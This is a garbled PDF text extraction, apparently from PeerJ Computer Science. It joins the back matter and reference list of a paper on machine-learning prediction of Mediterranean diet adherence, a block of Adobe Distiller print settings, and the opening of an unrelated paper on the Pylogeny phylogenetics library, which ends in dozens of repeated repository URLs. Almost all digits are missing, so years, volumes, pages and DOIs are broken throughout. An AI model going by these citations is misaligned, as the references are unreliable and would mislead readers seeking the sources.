the data, authored or reviewed drafts of the paper, and approved the final draft. � alejandro pazos conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e. approving body and any reference numbers): the study received written approval from the regional ethics committee for clinical research (code / ceic galicia). arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: data is available at figshare: fernandez-lozano, carlos ( ): identification of predictive factors of the degree of adherence to the mediterranean diet through machine-learning techniques. figshare. dataset. doi . /m .figshare. .v . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abreu-reyes ja, Álvarez-luis d, arteaga-hernández v, sánchez-mendez m, abreu-gonzález r. . mediterranean diet adherence by patients with primary open angle glaucoma. archivos de la sociedad española de oftalmología ( ): – doi . /j.oftale. . . . alberti kgmm, eckel rh, grundy sm, zimmet pz, cleeman ji, donato ka, fruchart jc, james wpt, loria cm, smith sc. . harmonizing the metabolic syndrome: a joint interim statement of the international diabetes federation task force on epidemiology and prevention; national heart, lung, and blood institute; american heart association; world heart federation; international. circulation ( ): – . anta rmo, lopez-solaber am, perez-farinos n, ortega anta rm, lópez-solaber am, pérez-farinós n. . associated factors of obesity in spanish representative samples. nutricion hospitalaria ( ): – . buckland g, bach-faig a, majem ls. . eficacia de la dieta mediterránea en la prevención de la obesidad. una revisión de la bibliografía. revista española de obesidad ( ): – . barbosa murillo jap, rodríguez m ng, hernández h de valera ym, hernández h ra, herrera m ha. . masa muscular, fuerza muscular y otros componentes de funcionalidad en adultos mayores institucionalizados de la gran caracas-venezuela. nutricion hospitalaria ( ): – . bartlett ms. . properties of sufficiency and statistical tests. proceedings of the royal society of london: series a, mathematical and physical sciences ( ): – . bertoli s, leone a, vignati l, bedogni g, martínez-gonzález mÁ, bes-rastrollo m, spadafranca a, vanzulli a, battezzati a. . adherence to the mediterranean diet is inversely associated with visceral abdominal tissue in caucasian subjects. clinical nutrition ( ): – doi . /j.clnu. . . . bischl b, lang m, kotthoff l, schiffner j, richter j, studerus e, casalicchio g, jones z. . mlr: machine learning in r. journal of machine learning research ( ): – . bonfanti n, fernandez jm, gomez-delgado f, perez-jimenez f. . effect of two hypocaloric diets and their combination with physical exercise on basal metabolic rate and body composition. nutricion hospitalaria ( ): – . bonnefoy m, jauffret m, kostka t, jusot jf. . usefulness of calf circumference measurement in assessing the nutritional state of hospitalized elderly people. gerontology ( ): – doi . / . breiman l. . random forests. machine learning ( ): – doi . /a: . bruno e, manoukian s, venturelli e, oliverio a, rovera f, iula g, morelli d, peissel b, azzolini j, roveda e, pasanisi p. . adherence to mediterranean diet and metabolic arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.oftale. . . http://dx.doi.org/ . /j.clnu. . . http://dx.doi.org/ . / http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ syndrome in brca mutation carriers. integrative cancer therapies ( ): – doi . / . burges cjc. . a tutorial on support vector machines for pattern recognition. data mining and knowledge discovery ( ): – doi . /a: . careau v. . energy intake, basal metabolic rate, and within-individual trade-offs in men and women training for a half marathon: a reanalysis. physiological and biochemical zoology ( ): – doi . / . chrysohoou c, panagiotakos db, pitsavos c, das un, stefanadis c. . adherence to the mediterranean diet attenuates inflammation and coagulation process in healthy adults: the attica study. journal of the american college of cardiology ( ): – doi . /j.jacc. . . . corral s, gonzález m, pereña j, seisdedos n. . adaptación española del inventario de trastornos de la conducta alimentaria. madrid: tea. cortes c, vapnik v. . support-vector networks. machine learning : – . cristianini n, shawe-taylor j. . an introduction to support vector machines: and other kernel- based learning methods. new york: cambridge university press. cutillas ab, herrero e, de san eustaquio a, zamora s, pérez-llamas f. . prevalencia de peso insuficiente, sobrepeso y obesidad, ingesta de energía y perfil calórico de la dieta de estudiantes universitarios de la comunidad autónoma de la región de murcia (españa). nutricion hospitalaria ( ): – . de la montaña miguélez j, cobas n, rodríguez m, míguez bernárdez m, castro sobrino l. . adherencia a la dieta mediterranea y su relación con el índice de masa corporal en universiarios de galicia. nutrición clínica y dietética hospitalaria ( ): – . de viñaspre op, oronoz m. . snomed ct in a language isolate: an algorithm for a semiautomatic translation. bmc medical informatics and decision making (suppl. ):s doi . / - - -s -s . della camera pa, morselli s, cito g, tasso g, cocci a, laruccia n, travaglini f, del fabbro d, mottola ar, gacci m, serni s, carini m, natali a. . sexual health, adherence to mediterranean diet, body weight, physical activity and mental state: factors correlated to each other. urologia journal ( ): – doi . /uj. . downer mk, gea a, stampfer m, sánchez-tainta a, corella d, salas-salvadó j, ros e, estruch r, fitó m, gómez-gracia e, arós f, fiol m, de-la corte fjg, serra-majem l, pinto x, basora j, sorlí jv, vinyoles e, zazpe i, martínez-gonzález m-Á. . predictors of short- and long-term adherence with a mediterranean-type diet intervention: the predimed randomized trial. international journal of behavioral nutrition and physical activity ( ): doi . /s - - - . dussaillant c, echeverría g, inés urquiaga, nicolás velasco and attilio rigotti. . evidencia actual sobre los beneficios de la dieta mediterránea en salud. artículo de revisión rev med chilerev med chile ( ): – . díaz-uriarte r, de andrés sa. . gene selection and classification of microarray data using random forest. bmc bioinformatics ( ): doi . / - - - . espina a, ortego ma, de alda io, yenes f, aleman a. . la imagen corporal en los trastornos alimentarios. body shape in eating disorders ( ): – . estruch r, martínez-gonzález ma, corella d, salas-salvadó j, fitó m, chiva-blanch g, fiol m, gómez-gracia e, arós f, lapetra j, serra-majem l, pintó x, buil-cosiales p, sorlí jv, muñoz ma, basora-gallisá j, lamuela-raventós rm, serra-mir m, ros e. . effect of a high-fat mediterranean diet on bodyweight and waist circumference: a prespecified secondary arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /a: http://dx.doi.org/ . / http://dx.doi.org/ . /j.jacc. . . http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /uj. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ outcomes analysis of the predimed randomised controlled trial. lancet diabetes & endocrinology ( ): – doi . /s - ( ) - . estruch r, ros e, salas-salvadó j, covas m-i, corella d, arós f, gómez-gracia e, ruiz-gutiérrez v, fiol m, lapetra j, lamuela-raventos rm, serra-majem l, pintó x, basora j, muñoz ma, sorlí jv, martínez ja, martínez-gonzález ma. . primary prevention of cardiovascular disease with a mediterranean diet. new england journal of medicine ( ): . farias g, thieme rd, teixeira lm, heyde me, bettini s, radominski r. . nutrición hospitalaria trabajo original. nutricion hospitalaria ( ): – . fawcett t. . an introduction to roc analysis. pattern recognition letters ( ): – doi . /j.patrec. . . . fernandez-lozano c, gestal m, munteanu cr, dorado j, pazos a. a. a methodology for the design of experiments in computational intelligence with multiple regression models. peerj ( ):e doi . /peerj. . fernandez-lozano c, seoane j, gestal m, gaunt t, dorado j, pazos a, campbell c. b. texture analysis in gel electrophoresis images using an integrative kernel-based approach. scientific reports ( ): doi . /srep . finucane m, stevens g, cowan m, danaei g, lin jk, paciorek cj, singh gm, gutierrez hr, lu y, bahalim an, farzadfar f, riley lm, ezzati m. . national, regional, and global trends in body-mass index since : systematic analysis of health examination surveys and epidemiological studies with country. lancet ( ): – doi . /s - ( ) - . garner d. . edi- : inventario de trastornos de la conducta alimentaria: manual. madrid: tea. grao-cruces a, nuviala a, fernandez-martinez a, martinez-lopez e-j. . relationship of physical activity and sedentarism with tobacco and alcohol consumption, and mediterranean diet in spanish teenagers. nutricion hospitalaria ( ): – . hechenbichler k, schliep k. . weighted k-nearest-neighbor techniques and ordinal classification. collaborative research center , discussion paper . doi . /ubm/epub. . hu z, mao j-h, curtis c, huang g, gu s, heiser l, lenburg me, korkola je, bayani n, samarajiwa s, seoane ja, dane ma, esch a, feiler hs, wang nj, hardwicke ma, laquerre s, jackson j, wood kw, weber b, spellman pt, aparicio s, wooster r, caldas c, gray jw. . genome co-amplification upregulates a mitotic gene network activity that predicts outcome and response to mitotic protein inhibitors in breast cancer. breast cancer research ( ): doi . /s - - -y. estruch r, ros e, salas-salvadó j, covas mi, corella d, arós f, gómez-gracia e, ruiz-gutiérrez v, lapetra j, lamuela-raventos rm, serra-majem l, pintó x, basora j, muñoz ma, sorli jv, martinez ja, fitó m, gea a, hernan ma, martinez-gonzalez ma, for the predimed study investigators. . primary prevention of cardiovascular disease with a mediterranean diet supplemented with extra-virgin olive oil or nuts. new england journal of medicine ( ):e doi . /nejmoa . jover e. . Índice cintura/cadera—obesidad y riesgo cardiovascular. anales de medicina interna : – . kanjo e, younis e, sherkat n. . towards unravelling the relationship between on-body, environmental and emotion data using sensor information fusion approach. information fusion : – . arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /srep http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /ubm/epub. http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /nejmoa http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kim j, bowlby r, mungall aj, robertson ag, odze rd, cherniack ad, shih j, pedamallu cs, cibulskis c, dunford a, meier sr, kim j, raphael bj, wu h-t, wong am, willis je, bass aj, derks s, garman k, mccall sj, wiznerowicz m, pantazi a, parfenov m, thorsson v, shmulevich i, dhankani v, miller m, sakai r, wang k, schultz n, shen r, arora a, weinhold n, sánchez-vega f, kelsen dp, zhang j, felau i, demchok j, rabkin cs, camargo mc, zenklusen jc, bowen j, leraas k, lichtenberg tm, curtis c, seoane ja, ojesina ai, beer dg, gulley ml, pennathur a, luketich jd, zhou z, weisenberger dj, akbani r, lee j-s, liu w, mills gb, zhang w, reid bj, hinoue t, laird pw, shen h, piazuelo mb, schneider bg, mclellan m, taylor-weiner a, cibulskis c, lawrence m, cibulskis k, stewart c, getz g, lander e, gabriel sb, ding l, mclellan md, miller ca, appelbaum el, cordes mg, fronick cc, fulton la, mardis er, wilson rk, schmidt hk, fulton rs, ally a, balasundaram m, bowlby r, carlsen r, chuah e, dhalla n, holt ra, jones sjm, kasaian k, brooks d, li hi, ma y, marra ma, mayo m, moore ra, mungall aj, mungall kl, robertson ag, schein je, sipahimalani p, tam a, thiessen n, wong t, cherniack ad, shih j, pedamallu cs, beroukhim r, bullman s, cibulskis c, murray ba, saksena g, schumacher se, gabriel s, meyerson m, hadjipanayis a, kucherlapati r, pantazi a, parfenov m, ren x, park pj, lee s, kucherlapati m, yang l, baylin sb, hoadley ka, weisenberger dj, bootwalla ms, lai ph, van den berg dj, berrios m, holbrook a, akbani r, hwang j-e, jang h-j, liu w, weinstein jn, lee j-s, lu y, sohn bh, mills g, seth s, protopopov a, bristow ca, mahadeshwar hs, tang j, song x, zhang j, laird pw, hinoue t, shen h, cho j, defrietas t, frazer s, gehlenborg n, heiman di, lawrence ms, lin p, meier sr, noble ms, voet d, zhang h, kim j, polak p, saksena g, chin l, getz g, wong am, raphael bj, wu h-t, lee s, park pj, yang l, thorsson v, bernard b, iype l, miller m, reynolds sm, shmulevich i, dhankani v, abeshouse a, arora a, armenia j, kundra r, ladanyi m, lehmann k-v, gao j, sander c, schultz n, sánchez-vega f, shen r, weinhold n, chakravarty d, zhang h, radenbaugh a, hegde a, akbani r, et al. . integrated genomic characterization of oesophageal carcinoma. nature ( ): – . krzysztoszek j, wierzejska e, zielińska a. . obesity: an analysis of epidemiological and prognostic research. archives of medical science ( ): – . lack g, fox d, northstone k, golding j. . factors associated with the development of peanut allergy in childhood. new england journal of medicine ( ): – . li x, li j, wu y. . a global optimization approach to multi-polarity sentiment analysis. plos one ( ): – . lópez-sobaler am, aparicio a, aranceta-bartrina j, gil Á, gonzález-gross m, serra-majem l, varela-moreiras g, ortega rm. . overweight and general and abdominal obesity in a representative sample of spanish adults: findings from the anibes study. biomed research international : . machado p, romero j, nadal m, santos a, correia j, carballal a. . computerized measures of visual complexity. acta psychologica : – doi . /j.actpsy. . . . martínez-gonzález ma, garcía-lópez m, bes-rastrollo m, toledo e, martínez-lapiscina eh, delgado-rodriguez m, vazquez z, benito s, beunza jj. . mediterranean diet and the incidence of cardiovascular disease: a spanish cohort. nutrition, metabolism and cardiovascular diseases ( ): – . martínez-gonzález ma, salas-salvadó j, estruch r, corella d, fitó m, ros e. . benefits of the mediterranean diet: insights from the predimed study. progress in cardiovascular diseases ( ): – doi . /j.pcad. . . . arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.actpsy. . . http://dx.doi.org/ . /j.pcad. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ marventano s, godos j, platania a, galvano f, mistretta a, grosso g. . mediterranean diet adherence in the mediterranean healthy eating, aging and lifestyle (meal) study cohort. international journal of food sciences and nutrition ( ): – . melaku ya, gill tk, taylor aw, adams r, shi z. . association between nutrient patterns and bone mineral density among ageing adults. clinical nutrition espen : – doi . /j.clnesp. . . . míguez bernárdez m, de la montaña miguélez j, gonzález carnero j, gonzález rodríguez m. . concordancia entre la autopercepción de la imagen corporal y el estado nutricional en universitarios de orense. nutricion hospitalaria ( ): – . norman k, smoliner c, valentini l, lochs h, pirlich m. . is bioelectrical impedance vector analysis of value in the elderly with malnutrition and impaired functionality? nutrition ( – ): – doi . /j.nut. . . . ortega anta rm, lópez sobaler am. . primeras jornadas ucm-asen avances y controversias en nutricion y salud. nutrición hospitalaria ( ): – . pons p, jaen j, catala a. . assessing machine learning classifiers for the detection of animals’ behavior using depth-based tracking. expert systems with applications : – doi . /j.eswa. . . . pérez c, aranceta j. . ¿es posible la dieta mediterránea en el siglo xxi? in: alonso e, varela g, silvestre d, eds. la dieta mediterránea en el marco de la nutrición comunitaria: luces y sombras. madrid: instituto tomás pascual sanz, – . pérez-caballero g, andrade j, olmos p, molina y, jiménez i, durán j, fernandez-lozano c, miguel-cruz f. . authentication of tequilas using pattern recognition and supervised classification. trac—trends in analytical chemistry : – . r core team. . r: a language and environment for statistical computing. vienna: the r foundation for statistical computing. available at http://www.r-project.org/. ravasco p, anderson h, mardones f. . métodos de valoración del estado nutricional. nutricion hospitalaria (suppl. ): – . rodriguez a, fernandez-lozano c, dorado j, rabuñal jr. . two-dimensional gel electrophoresis image registration using block-matching techniques and deformation models. analytical biochemistry : – doi . /j.ab. . . . rodriguez rodriguez e, lopez plaza b, lopez sobaler m, ortega r. . prevalencia de sobrepeso y obesidad en adultos españoles. nutricion hospitalaria ( ): – . rolland y, lauwers-cances v, cournot m, nourhashémi f, reynish w, rivière d, vellas b, grandjean h. . sarcopenia, calf circumference, and physical function of elderly women: a cross-sectional study. journal of the american geriatrics society ( ): – doi . /j. - . . .x. romero pérez a, rivas velasco a. . adherence to mediterranean diet and bone health. nutricion hospitalaria ( ): – . saeys y, inza i, larrañaga p. . a review of feature selection techniques in bioinformatics. bioinformatics ( ): – doi . /bioinformatics/btm . samworth rj. . optimal weighted nearest neighbour classifiers. annals of statistics ( ): – doi . / -aos . savanelli mc, barrea l, macchia pe, savastano s, falco a, renzullo a, scarano e, nettore ic, colao a, di somma c. . preliminary results demonstrating the impact of mediterranean diet on bone health. journal of translational medicine ( ): doi . /s - - -x. arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.clnesp. . . http://dx.doi.org/ . /j.nut. . . http://dx.doi.org/ . /j.eswa. . . http://www.r-project.org/ http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . / -aos http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ serra-majem l, roman b, estruch r. . scientific evidence of interventions using the mediterranean diet: a systematic review. nutrition reviews ( pt ):s –s doi . /j. - . .tb .x. shapira n. . the potential contribution of dietary factors to breast cancer prevention. european journal of cancer prevention ( ): – doi . /cej. . shapiro ss, wilk mb. . an analysis of variance test for normality (complete samples). biometrika ( – ): – doi . /biomet/ . - . . skoraczyñski g, dittwald p, miasojedow b, szymkuć s, gajewska ep, grzybowski ba, gambin a. . predicting the outcomes of organic reactions via machine learning: are current descriptors sufficient? scientific reports ( ): doi . /s - - - . sofi f, macchi c, abbate r, gensini gf, casini a. . mediterranean diet and health status: an updated meta-analysis and a proposal for a literature-based adherence score. public health nutrition ( ): – doi . /s . srivastava r, batra a, dhawan d, bakhshi s. . association of energy intake and expenditure with obesity: a cross-sectional study of pediatric patients following treatment for leukemia. pediatric hematology and oncology ( ): – doi . / . . . sámano r, rodríguez-ventura a, sánchez-jiménez b, godínez e, noriega a, zelonka r, garza m, nieto j. . satisfacción de la imagen corporal en adolescentes y adultos mexicanos y su relación con la autopercepción corporal y el índice de masa corporal real. nutricion hospitalaria ( ): – . Štefan l, Čule m, milinović i, sporiš g, juranko d. . the relationship between adherence to the mediterranean diet and body composition in croatian university students. european journal of integrative medicine (suppl. c): – . tibshirani r. . regression selection and shrinkage via the lasso. journal of the royal statistical society, series b (methodological) ( ): – . travé td, castroviejo a. . adherencia a la dieta mediterránea en la población universitaria. nutrición hospitalaria ( ): – . trichopoulou a. . traditional mediterranean diet and longevity in the elderly: a review. public health nutrition ( ): – doi . /phn . trichopoulou a, bamia c, norat t, overvad k, schmidt eb, tjonneland a, halkjær j, clavel-chapelon f, vercambre m-n, boutron-ruault m-c, linseisen j, rohrmann s, boeing h, weikert c, benetou v, psaltopoulou t, orfanos p, boffetta p, masala g, pala v, panico s, tumino r, sacerdote c, de-mesquita hbb, ocke mc, peeters ph, van der schouw yt, gonzález c, sanchez mj, chirlaque md, moreno c, larrañaga n, van guelpen b, jansson j-h, bingham s, khaw k-t, spencer ea, key t, riboli e, trichopoulos d. . modified mediterranean diet and survival after myocardial infarction: the epic-elderly study. european journal of epidemiology ( ): – doi . /s - - - . unesco. . the mediterranean diet inscription on the representative list of the intangible cultural heritage of humanity. available at https://ich.unesco.org/doc/src/ -en.pdf. vapnik vn. . the nature of statistical learning theory. new york: springer new york, inc. vert jp, tsuda k, schölkopf b. . a primer on kernel methods, kernel methods in computational biology. london: mit press, – . widmer rj, flammer aj, lerman lo, lerman a. . the mediterranean diet, its components, and cardiovascular disease. american journal of medicine ( ): – doi . /j.amjmed. . . . arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /cej. http://dx.doi.org/ . /biomet/ . - . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s http://dx.doi.org/ . / . . http://dx.doi.org/ . /phn http://dx.doi.org/ . /s - - - https://ich.unesco.org/doc/src/ -en.pdf http://dx.doi.org/ . /j.amjmed. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ zaragoza martí a, ferrer cascales r, cabañero martínez mj, hurtado sánchez ja, laguna pérez a. . adherencia a la dieta mediterránea y su relación con el estado nutricional en personas mayores. nutrición hospitalaria ( ): – . zou h, hastie t. . regularization and variable selection via the elastic net. journal of the royal statistical society: series b statistical methodology ( ): – doi . /j. - . . .x. arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j. - . . .x https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. identification of predictive factors of the degree of adherence to the mediterranean diet through machine-learning techniques introduction materials and methods results discussion conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice pylogeny: an open-source python framework for phylogenetic tree reconstruction and search space heuristics submitted february accepted june published june corresponding author alexander safatli, safatli@cs.dal.ca academic editor keith crandall additional information and declarations can be found on page doi . /peerj-cs. copyright safatli and blouin distributed under creative commons cc-by . open access pylogeny: an open-source python framework for phylogenetic tree reconstruction and search space heuristics alexander safatli and christian blouin , faculty of computer science, dalhousie university, halifax, ns, canada department of biochemistry and molecular biology, dalhousie university, halifax, ns, canada abstract summary. pylogeny is a cross-platform library for the python programming language that provides an object-oriented application programming interface for phylogenetic heuristic searches. its primary function is to permit both heuristic search and analysis of the phylogenetic tree search space, as well as to enable the design of novel algorithms to search this space. to this end, the framework supports the structural manipulation of phylogenetic trees, in particular using rearrangement operators such as nni, spr, and tbr, the scoring of trees using parsimony and likelihood methods, the construction of a tree search space graph, and the programmatic execution of a few existing heuristic programs. the library supports a range of common phylogenetic file formats and can be used for both nucleotide and protein data. furthermore, it is also capable of supporting gpu likelihood calculation on nucleotide character data through the beagle library. availability. existing development and source code is available for contribution and for download by the public from github (http://github.com/alexsafatli/pylogeny). a stable release of this framework is available for download through pypi (python package index) at http://pypi.python.org/pypi/pylogeny. subjects bioinformatics, computational biology keywords phylogenetic, python, heuristic, alignment, maximum likelihood, library, combinatorial, programming, parsimony introduction there is a need for tree manipulation, scoring, and flexible heuristic designs as part of larger bioinformatics pipelines. introduced here is a cross-platform library called pylogeny intended for heuristic search and analysis of the phylogenetic tree search space, as well as the design of novel algorithms to search this space. this framework is written in the python programming language, yet it uses efficient auxiliary libraries to perform computationally expensive steps such as scoring. as a programming interface, pylogeny addresses the needs of both researchers and programmers who are exploring the combinatorial problem associated with phylogenetic trees. the phylogenetic tree search space describes the combinatorial space of all possible phylogenetic trees for a set of operational taxonomic units. this forms a finite graph how to cite this article safatli and blouin ( ), pylogeny: an open-source python framework for phylogenetic tree reconstruction and search space heuristics. peerj comput. sci. :e ; doi . /peerj-cs. mailto:safatli@cs.dal.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://github.com/alexsafatli/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny 